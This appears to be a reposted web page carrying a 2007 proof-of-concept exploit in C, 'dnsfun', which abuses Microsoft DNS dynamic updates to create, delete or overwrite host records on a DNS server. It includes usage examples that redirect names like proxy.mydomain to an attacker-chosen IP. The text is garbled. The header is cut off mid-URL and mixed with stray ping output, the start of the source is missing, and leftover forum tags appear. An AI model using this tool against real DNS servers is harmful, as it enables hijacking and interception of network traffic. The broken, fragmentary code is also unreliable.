Microsoft DNS Server (Dynamic DNS Updates) Remote Exploit

时间:2021-05-24

/*
Exploiting Microsoft DNS Dynamic Updates for Fun and profit
Andres Tarasco Acu?a - (c) 2007
Url: http://
Haciendo ping a FakeProxy.fooooo.com [66.6.66.6] con 32 bytes de datos:

D:\DNSfun>dnsfun.exe -s 10.100.1.1 -q proxy.mydomain -u 66.6.66.6
Microsoft Dynamic DNS Updates - Proof of Concept
http:// -u ( resolved as CNAME /en-us/library/ms682007.aspx
if (Credentials->UserLength==0) {
status=DnsAcquireContextHandle(FALSE,NULL,&ContextHandle); //Context with default Credentials
} else {
status=DnsAcquireContextHandle(FALSE,Credentials,&ContextHandle); //Context with Custom Credentials
}

if (status == ERROR_SUCCESS) {
if (CREATERECORD) {

result=(PDNS_RECORDA)malloc(sizeof(DNS_RECORDA));
memset(result,'\0',sizeof(DNS_RECORDA));
result->wType=CreationType; //DNS_TYPE_A by default
if (CreationType==DNS_TYPE_CNAME) {
printf("[ ] Creating DNS CName Record for %s (%s)\n",CreateDnsRecord,NewIpAddress);
result->Data.Cname.pNameHost=NewIpAddress;
} else {
printf("[ ] Creating DNS A Record for %s (%s)\n",CreateDnsRecord,NewIpAddress);
result->Data.A.IpAddress=inet_addr(NewIpAddress);
}
result->pName=CreateDnsRecord;
result->wDataLength=4;
result->Flags.S.Section=1;
result->Flags.S.CharSet=DnsCharSetAnsi;
result->pNext=NULL;
status=DnsModifyRecordsInSet_A(result, //add record
NULL, //delete record
Options,
ContextHandle,
servers,
NULL);
if (status ==ERROR_SUCCESS) {
printf("[ ] Host Created. Rechecking Record...\n");
DnsRecordListFree(result,DnsFreeRecordList);
result=DnsQueryA(CreateDnsRecord,servers);
} else {
printf("[-] Error: Unable to create %s (%i)\n",CreateDnsRecord,status);
}
} else if (DELETERECORD) {
printf("[ ] Trying to resolve Host: %s before deleting\n",DeleteDnsRecord);
result=DnsQueryA(DeleteDnsRecord,servers);
if (result!=NULL) {
printf("[ ] Trying to Delete Record. Are You Sure? (Y/N)...");
i=getchar(); if (i!='y') return(-1);
printf("[ ] Deleting record %s\n",DeleteDnsRecord);
status=DnsModifyRecordsInSet_A(NULL, //add record
result, //delete record
Options,
ContextHandle,
servers,
NULL);
if (status ==ERROR_SUCCESS) {
printf("[ ] Host Deleted. Rechecking Record %s...\n",DeleteDnsRecord);
DnsRecordListFree(result,DnsFreeRecordList);
result=DnsQueryA(DeleteDnsRecord,servers);
} else {
printf("[-] Error: Unable to Delete %s\n",DeleteDnsRecord);
}
} else {
printf("[-] Host %s not found\n",DeleteDnsRecord);
}
} else if (UPDATERECORD) {
// exit(1);
printf("[ ] Trying to resolve Host: %s before updating\n",TargetDnsRecord);
result=DnsQueryA(TargetDnsRecord,servers);
if (result->wType==DNS_TYPE_A ) {
printf("[ ] Trying to update record. Are You Sure? (Y/N)...");
i=getchar(); if (i!='y') return(-1);
result->Data.A.IpAddress=inet_addr(NewIpAddress);//Modify Dns record
ipaddr.S_un.S_addr = (result->Data.A.IpAddress);
printf("[ ] Trying to set ip address of the host %s to %s \n", TargetDnsRecord,NewIpAddress);//inet_ntoa(ipaddr));
printf("[ ] Trying to Modify Record...\n");
status=DnsReplaceRecordSetA(result,
Options, //Attempts nonsecure dynamic update. If refused, then attempts secure dynamic update.
ContextHandle,
servers,//pServerList,
NULL);//pReserved
if (status ==ERROR_SUCCESS) {
printf("[ ] Host Updated. Rechecking Record...\n");
DnsRecordListFree(result,DnsFreeRecordList);
result=DnsQueryA(TargetDnsRecord,servers);
} else {
printf("[-] Error: Unable to Delete %s\n",TargetDnsRecord);
}
} else {
printf("[-] Unable to Update Record (Type %x)\n",result->wType);
}
} else if (QUERYRECORD) {
printf("[ ] Query Information for host %s...\n",TargetDnsRecord);
result=DnsQueryA(TargetDnsRecord,servers);
DnsRecordListFree(result,DnsFreeRecordList);
} else {
printf("[-] Unknown Options\n");
return(-1);
}
} else {
printf("[-] Error Calling DnsAcquireContextHandle\n");
}
return (1);
}
/****************************************************************************/
void usage(char *argv[]) {
printf(" Usage:\n");
printf("\t%s\t -[s]d|c|q[u] \n",argv[0]);
printf(" Details:\n");
printf("\t%s\t -s ip (dns Server (optional))\n",argv[0]);
printf("\t%s\t -d fqdn (Delete dns record)\n",argv[0]);
printf("\t%s\t -q fqdn (Query dns record)\n",argv[0]);
printf("\t%s\t -c[a|c] ip (Create A or CName record (default A))\n",argv[0]);
printf("\t%s\t -u ip|fqdn (Update dns record (requires -q or -c))\n",argv[0]);
printf("\n Examples:\n");
printf("\t%s -s 10.0.0.1 -q proxy.mydomain.com -u 5.1.4.77 (Updates record)\n",argv[0]);
printf("\t%s -s 10.0.0.1 -d foo.mydomain.com (delete foo.mydomain.com record)\n",argv[0]);
printf("\t%s -s 10.0.0.1 -c atarasco.foo.mydomain.com -u 5.14.7.7 (creates record)\n",argv[0]);
printf("\t%s -s 10.0.0.1 -cc -u 5.14.7.7 (creates record)\n",argv[0]);
printf("\t%s -s 10.0.0.1 -q _ldap._tcp.mydomain (Query for srv record)\n",argv[0]);
exit(0);
}
/****************************************************************************/
[/u][/i][/i][/i][/i][/i]

声明:本页内容来源网络,仅供用户参考;我单位不保证亦不表示资料全面及准确无误,也不保证亦不表示这些资料为最新信息,如因任何原因,本网内容或者用户因倚赖本网内容造成任何损失或损害,我单位将不会负任何法律责任。如涉及版权问题,请提交至online#300.cn邮箱联系删除。

相关文章